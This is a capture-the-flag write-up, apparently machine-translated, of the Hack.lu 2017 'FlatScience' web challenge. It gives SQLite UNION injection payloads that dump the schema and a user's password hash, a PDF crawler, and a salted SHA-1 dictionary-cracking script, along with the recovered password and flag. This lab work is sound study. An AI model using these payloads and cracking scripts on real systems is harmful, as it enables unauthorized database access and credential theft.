XCTF WEB FlatScience (Hack.lu-2017)
Open the topic and found a bunch of jumps and pdf document:
did not find what prompted ,,, direct robots.txt view:
access, local admin.php admin login page is too ,,, got nothing, ,,
there is a login.php page ,, do not understand why all Login engage in two pages ,,,
right to view the source code, get a prompt:
debug debugging parameters? ? Direct parameter passing debug = 1 to get the source code, the following as the main code?:
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
$user = $_POST['usr'];
$pass = $_POST['pw'];
$db = new SQLite3('../fancy.db');
$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
if($res){
$row = $res->fetchArray();
}
else{
echo "<br>Some Error occourred!";
}
if(isset($row['id'])){
setcookie('name',' '.$row['name'], time() + 60, '/');
header("Location: /");
die();
}
}
if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! -->
Found not mysql database sqlite database ,,, is
seemingly still problematic injection! ! Did not do any processing parameters directly spliced ,,,
emmmm, no contact with the injection of sqlite ,,, a little fishing, ah, now can only learn ,,,,
SQLite manual injection method Summary
injection statement: usr=' union select name,sql from sqlite_master--+&pw=admin
the sqlite_master is a sqlite database Hide table ,,,, following fields: type/name/tbl_name/rootpage/sql
because the code has prompted the response header to see Cookie-SET:
URL decoded:
name= CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255));
emmmm table names and field seems to have been out? ? ? This estimate is the most basic sqlite inject it ,,,,
syntax looks like mysql syntax and almost eh ,,,,
injection statement:
usr=' union select id,id from Users--+&pw=admin
usr=' union select id,name from Users--+&pw=admin
usr=' union select id,password from Users--+&pw=admin
usr=' union select id,hint from Users--+&pw=admin
The results were obtained:
name=+1;
name=+admin;
name=+3fab54a50e770d830c0416df817567662a9dc85c;
name=+my fav word in my fav paper?!;
Tip is my favorite word in my newspaper? ? ? pdf? ? ?
Password has been encrypted way we seem to know ,, sha1 ,, source, but given the salt ,,,
entitled to do half the class room ,,, ,,,,
now continue! ! !
Sqlite has been injected above the user name and password, and encryption is also known, it is estimated the next step is we need to crack the code!
It estimates password in the PDF document inside the document but it seems a lot of ,,, how you want me to do? ? ?
PDF documents first crawled out of? ?
Wrote a script incomplete crawling URLs ,,,,, no de-emphasis, it would have been crawling,
himself reckoned almost over when the manual can (seemingly on 30 pdf):
import urllib.request
import requests
import queue
import re
def GetFile(url):
file_name = url.split('/')[-1]
file_name = 'pdf/' + file_name
Content = urllib.request.urlopen(url).read()
f = open(file_name,'wb')
f.write(Content)
f.close()
print("Success : " +file_name)
def GetUrl(base_url,url):
r = requests.get(url)
text = r.text
pattern = re.compile('<a.+?href=\"(.+?)\".+?>.+?<\/a>')
urls = pattern.findall(text)
#print(urls)
for i in urls:
i = base_url + i
print(i)
if i[-3:] == 'pdf':
GetFile(i)
else:
q.put(i)
url = "http://111.198.29.45:37745/index.html"
q = queue.Queue()
q.put(url)
while not q.empty():
url = q.get()
base_url = url.split('index.html')[0]
#print(base_url,url)
GetUrl(base_url,url)
Pdf then have to get a script written in python blasting ,,, day! ! !
Pdf directly put into txt, then ~ ~ in blasting by reading txt
pdf turn txt I can not write (too much food ah / crying) ,,, borrowed from big brother's blog python read pdf files and convert the txt file
(pdf manually turn txt is not acceptable, that is not copy plus paste Gong, pro-test !!!)
script as follows (wherein the function is a reference pdf_2_txt ~~ big brother implementation code):
from pdfminer.pdfparser import PDFParser, PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
import logging
import hashlib
import re
import os
def pdf_2_txt(start,end):
pdf_filename = start
txt_filename = end
# 不显示warning
logging.propagate = False
logging.getLogger().setLevel(logging.ERROR)
device = PDFPageAggregator(PDFResourceManager(), laparams=LAParams())
interpreter = PDFPageInterpreter(PDFResourceManager(), device)
doc = PDFDocument()
parser = PDFParser(open(pdf_filename, 'rb'))
parser.set_document(doc)
doc.set_parser(parser)
doc.initialize()
# 检测文档是否提供txt转换,不提供就忽略
if not doc.is_extractable:
raise PDFTextExtractionNotAllowed
else:
with open(txt_filename, 'w', encoding="utf-8") as fw:
print("num page:{}".format(len(list(doc.get_pages()))))
for page in doc.get_pages():
interpreter.process_page(page)
# 接受该页面的LTPage对象
layout = device.get_result()
# 这里layout是一个LTPage对象 里面存放着 这个page解析出的各种对象
# 一般包括LTTextBox, LTFigure, LTImage, LTTextBoxHorizontal 等等
# 想要获取文本就获得对象的text属性,
for x in layout:
if isinstance(x, LTTextBoxHorizontal):
results = x.get_text()
fw.write(results)
filePath = 'C:\\Users\\Administrator\\Desktop\\pdf'
lists = os.listdir(filePath)
for i in range(1,31):
x = "pdf/" + lists[i - 1]
pdf_2_txt(x,'txt/' + str(i) + '.txt')
for i in range(1,31):
f = open("txt/" + str(i) + ".txt","r", encoding='UTF-8').read()
wordlist = re.split(" |\n",f)
for i in wordlist:
i = i + "Salz!"
encode = hashlib.sha1(i.encode('utf-8')).hexdigest()
if encode == "3fab54a50e770d830c0416df817567662a9dc85c":
print("Success! password is :" + i)
break
Successfully write a script, and successfully get the password:
After entering the password to admin.php: ThinJerboa
successfully obtain flag:
get flag:flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
Scripting capabilities, or worse, no system is not studied python ,,
write two scripts written afternoon ,,, if I have the strength to lift this would be like? ? ?